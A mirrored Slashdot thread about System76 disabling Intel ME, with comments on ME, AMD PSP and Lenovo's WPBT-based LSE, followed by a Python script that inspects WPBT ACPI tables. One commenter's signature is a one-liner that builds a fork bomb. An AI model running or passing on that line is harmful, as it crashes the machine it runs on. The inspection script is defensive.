Slashdot Mirror


System76 Will Disable Intel Management Engine On Its Linux Laptops (liliputing.com)

System76 is rolling out a firmware update for its recent laptops that will disable the Intel Management Engine altogether. The decision comes after a major security vulnerability was discovered that would allow an attacker with local access to execute arbitrary code. Liliputing reports: What's noteworthy in the System76 announcement is that the PC maker isn't just planning to disable Intel ME in computers that ship from now on. The company will send out an update that disables it on existing computers with 6th, 7th, or 8th-gen Intel Core processors. System76 also notes that Intel ME "provides no functionality for System76 laptop customers and is safe to disable." Right now the firmware update will only be available for computers running Ubuntu 16.04 or later or a related operating system with the System76 driver. But the company says it's working on developing a command line tool that should work on laptops running other GNU/Linux-based operating systems. System76 says it will also release an update for its desktop computers... but on those machines the update will patch the security vulnerability rather than disabling Intel ME altogether.

10 of 149 comments

  1. Re:If it works by Narcocide · · Score: 3, Interesting

    I want to belieeeeeve!!! Save us system76 you're our only hope!!

  2. Re:I will only buy non-Intel chips now by Narcocide · · Score: 5, Interesting

    At this point all AMD has to do is willingly release the information to provably disable their own management engine equivalent and they can sweep the market.

  3. Re: I will only buy non-Intel chips now by lucasnate1 · · Score: 5, Informative

    Too late, AMD has PSP.

  4. Re:If it works by cfalcon · · Score: 4, Informative

    There was new-ish news about this from the summer. A few privacy-minded places are starting to shut the ME down in various ways, some by spoofing the flag the government uses to disable it on its own systems, others in other ways.

  5. Having worked at Intel... by GerryGilmore · · Score: 4, Insightful

    ...IME was originally designed for servers only. Any OldFarts(TM) out there - remember crash carts? Yeah, the ability to remotely power-cycle servers was a really big deal when you're running hundreds/thousands of servers and VMs were just a pie in the sky. Also, basic front-end network management 101 handled security. There are still good reasons to allow IME in server deployments, but I see no good reason for including this in laptops. I suspect that this was brought into the Core line due to those people building servers needing remote management using i7, etc. chips, but that's just a guess.

    1. Re:Having worked at Intel... by tlhIngan · · Score: 4, Interesting

      I suspect that this was brought into the Core line due to those people building servers needing remote management using i7, etc. chips, but that's just a guess.

      No, it was brought into the main chips because servers have stuff like IPMI and ILO for remote management, but employee PCs do not. And the same reason servers can be remotely managed can be applied to employee PCs and laptops. The only difference is servers are usually concentrated in a few areas, so it's much easier for 10,000 servers to be locally managed than 10,000 PCs, making the case for remote management of PCs even more critical.

      You can do bare metal bringups - perhaps the employee got to their desk and their PC is dead - it won't load the OS and there's lots of error messages. It's effectively ILO or IPMI for consumer grade machines.

      Of course, you can't "disable" IME - you can neuter it. The firmware that controls power and boot and startup and all that must still run in order for the main CPU to be brought up, so you need IME to do that part. Neutering basically disables all the remote management while leaving the power management code still active.

  6. Re:LOL! Not really (downmod me? I repost)... apk by OrangeTide · · Score: 4, Interesting

    Your downmodded posts aren't hidden. They are correctly categorized as garbage. Some people will browse and see the 0 and -1 garbage, usually other mods or brave people with too much free time.

    Reasons that APK deserves frequent downmodding:
      1. lacks an account and always posts as AC
      2. makes duplicate posts
      3. admits to trying to avoid moderation
      4. frequently posts off topic advertisements for his [free] products and services.
      5. talks like a git. really his English phrasing is bizarre.

    --
    “Common sense is not so common.” — Voltaire
  7. It should be opt-in, not opt-out by Picodon · · Score: 5, Insightful

    ...I can't agree with the many reactionary Slashdot commenters...

    ...there should be a simple and transparent way to completely and verifiably disable it, ...

    I think it’s a bit more than that. The feature may be useful, but the outrage is legitimate. Consumers, most of whom arguably have no need for such a feature, fortuitously found out about its existence and that it is enabled in their computers. They had not been told about it, so they had no way to even try to use it. Other people (government, corporate, hackers) knew about it, so the malicious among those were in the position of abusing it (by exploiting its features and its security flaws). No wonder consumers are up in arms over this. They are not over-reacting.

    So, no, a way to disable it is not enough. This kind of feature requires full disclosure (before you buy), documentation (so that you can actually use the feature if you want) and, at least on systems sold to consumers who are unlikely to use it, it should be entirely disabled by default. Institutional customers who buy computers in quantity can (and indeed do) request the configuration that they want (including, for example, activation of Intel’s anti-theft protection).

  8. Minix more popular on laptops than Linux by Keruo · · Score: 5, Interesting

    Isn't it mind-boggling that Minix is actually more used on laptops currently than Linux?

    (The management engine runs custom version of Minix)

    --
    There are no atheists when recovering from tape backup.
  9. Re:If it works by Hal_Porter · · Score: 3, Informative

    It gets worse. Some of them are probably still using Thinkpads, even though they're made by Lenovo. Now you'll say "No worries, if they re-image them they can avoid any spyware Lenovo put in there at the behest of the Chinese government".

    Uh yeah, that won't help. Lenovo uses the Windows Platform Binary feature to reinstall it. Basically you put an executable file into one of the ACPI tables. Windows copies it to disk and then runs it. With Administrator access. Probably more than Administrator access actually - I bet a native executable has more privilege than one running with Administrator rights on the Win32 subsystem does.

    https://www.theregister.co.uk/...

    To pull this off, the LSE exploits Microsoft's Windows Platform Binary Table (WPBT) feature. This allows PC manufacturers and corporate IT to inject drivers, programs and other files into the Windows operating system from the motherboard firmware.

    The WPBT is stored in the firmware, and tells Windows where in memory it can find an executable called a platform binary to run. Said executable will take care of the job of installing files before the operating system starts.

    "During operating system initialization, Windows will read the WPBT to obtain the physical memory location of the platform binary," Microsoft's documentation states.

    "The binary is required to be a native, user-mode application that is executed by the Windows Session Manager during operating system initialization. Windows will write the flat image to disk, and the Session Manager will launch the process."

    Crucially, the WPBT documentation stresses:

    The primary purpose of WPBT is to allow critical software to persist even when the operating system has changed or been reinstalled in a "clean" configuration ... Because this feature provides the ability to persistently execute system software in the context of Windows, it becomes critical that WPBT-based solutions are as secure as possible and do not expose Windows users to exploitable conditions.

    Oh dear. Secure as possible? Not in this case: security researcher Roel Schouwenberg found and reported a buffer-overflow vulnerability in the LSE that can be exploited to gain administrator-level privileges.

    I.e. even if you reinstall them from a known clean image, they can still regrow the amputated LSE. And even if the LSE is not spyware, it contains exploitable vulnerabilities that a third party could use to install whatever they wanted. Lenovo didn't do this in Thinkpads, but they could.

    At the moment the US is in the midst of media created paranoia about Russian hackers. Honestly if I were in charge of cybersecurity I'd be a lot more worried that the Chinese spy services would use something like LSE, with or without the cooperation of Lenovo, to spy on sensitive stuff.

    And of course it's not just Lenovo laptops. There's Huawei phones and routers. Or indeed US brands which make routers in China could have either hacked firmware loaded onto them, or the Chinese spy agencies could find and stockpile vulnerabilities in the manufacturer's firmware.

    And then you have companies like XiaoMi with their young pioneer uniformed bunny signifying their devotion to the regime as a Taiwanese friend of mine pointed out

    https://hungermarketingchina.w...

    If you buy US stuff, you expect the US companies to cooperate with the NSA. If you buy Chinese stuff you expect Chinese companies to cooperate with its Chinese equivalents. XiaoMi's Young Pioneer bunny is a none too subtle sign by the company that they're pro regime, and it's not unreasonable to assume if the government asked them to help it out with national security they'd say yes.

    Of course I can see

    --
    echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;
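The WPBT mechanism described in the comment above is straightforward to check for from Linux, because the kernel exposes every raw ACPI table the firmware publishes under /sys/firmware/acpi/tables/: a file named WPBT there means the firmware is offering Windows a platform binary to run at boot, whatever OS is actually installed. The following Python is an added example written for this page, not code from Lenovo, Microsoft or the commenter. The field layout follows Microsoft's published WPBT specification (a standard 36-byte ACPI header followed by handoff size, physical address, content layout, content type and a UTF-16LE argument string); the sysfs path is the standard one, and the sample table is constructed inline so the parser can be exercised offline.

```python
import struct
from pathlib import Path

# Standard ACPI description header: signature, length, revision, checksum,
# OEM ID, OEM table ID, OEM revision, creator ID, creator revision (36 bytes).
_ACPI_HDR = struct.Struct("<4sIBB6s8sI4sI")
# WPBT-specific body that follows the header (per Microsoft's WPBT spec):
# handoff memory size (u32), handoff physical address (u64),
# content layout (u8), content type (u8), input-arguments length (u16),
# followed by the UTF-16LE input-arguments string itself.
_WPBT_BODY = struct.Struct("<IQBBH")
_CHECKSUM_OFFSET = 9  # byte index of the checksum field inside the header

CONTENT_LAYOUT = {1: "single flat PE image"}
CONTENT_TYPE = {1: "native user-mode application"}

SYSFS_WPBT = "/sys/firmware/acpi/tables/WPBT"  # where Linux exposes the table


def acpi_checksum_ok(table: bytes) -> bool:
    """An ACPI table is well-formed when all its bytes sum to 0 mod 256."""
    return sum(table) % 256 == 0


def parse_wpbt(table: bytes) -> dict:
    """Decode a raw WPBT table into its fields; raises ValueError on malformed input."""
    if len(table) < _ACPI_HDR.size + _WPBT_BODY.size:
        raise ValueError("table too short to be a WPBT")
    sig, length, revision, _csum, oem_id, oem_tbl, _, _, _ = _ACPI_HDR.unpack_from(table, 0)
    if sig != b"WPBT":
        raise ValueError(f"unexpected ACPI signature {sig!r}")
    if length != len(table):
        raise ValueError(f"header length {length} != actual size {len(table)}")
    size, addr, layout, ctype, args_len = _WPBT_BODY.unpack_from(table, _ACPI_HDR.size)
    args_off = _ACPI_HDR.size + _WPBT_BODY.size
    if args_len % 2 or args_off + args_len > len(table):
        raise ValueError("input-arguments field is truncated or not UTF-16")
    args = table[args_off:args_off + args_len].decode("utf-16-le").rstrip("\x00")
    return {
        "revision": revision,
        "oem_id": oem_id.rstrip(b"\x00 ").decode("ascii", "replace"),
        "oem_table_id": oem_tbl.rstrip(b"\x00 ").decode("ascii", "replace"),
        "checksum_ok": acpi_checksum_ok(table),
        "image_size": size,
        "handoff_address": addr,
        "content_layout": CONTENT_LAYOUT.get(layout, f"unknown ({layout})"),
        "content_type": CONTENT_TYPE.get(ctype, f"unknown ({ctype})"),
        "input_arguments": args,
    }


def read_wpbt_from_sysfs(path: str = SYSFS_WPBT):
    """Return the parsed WPBT if the firmware publishes one, else None."""
    p = Path(path)
    if not p.exists():
        return None
    return parse_wpbt(p.read_bytes())


def build_wpbt(handoff_addr: int, image_size: int, args: str = "",
               oem_id: bytes = b"CONSTR", oem_tbl: bytes = b"EXAMPLE") -> bytes:
    """Construct a syntactically valid WPBT (sample data, not from any real firmware)."""
    arg_bytes = args.encode("utf-16-le")
    body = _WPBT_BODY.pack(image_size, handoff_addr, 1, 1, len(arg_bytes)) + arg_bytes
    length = _ACPI_HDR.size + len(body)
    hdr = _ACPI_HDR.pack(b"WPBT", length, 1, 0,
                         oem_id.ljust(6, b"\x00")[:6], oem_tbl.ljust(8, b"\x00")[:8],
                         1, b"EXMP", 1)
    table = bytearray(hdr + body)
    table[_CHECKSUM_OFFSET] = (-sum(table)) % 256  # fix up so the bytes sum to zero
    return bytes(table)


if __name__ == "__main__":
    found = read_wpbt_from_sysfs()
    if found is None:
        print("no WPBT published by this firmware")
    else:
        for k, v in found.items():
            print(f"{k:>18}: {hex(v) if isinstance(v, int) else v}")
```

On a machine that does publish a WPBT, the interesting fields are the handoff address and size (where in physical memory the PE image lives, which you can dump from /dev/mem or via the firmware image) and the content type, which per the spec must be a native user-mode application that Session Manager will write to disk and execute before the rest of the OS comes up. A failed checksum does not make the table harmless; it just means Windows is likely to ignore it.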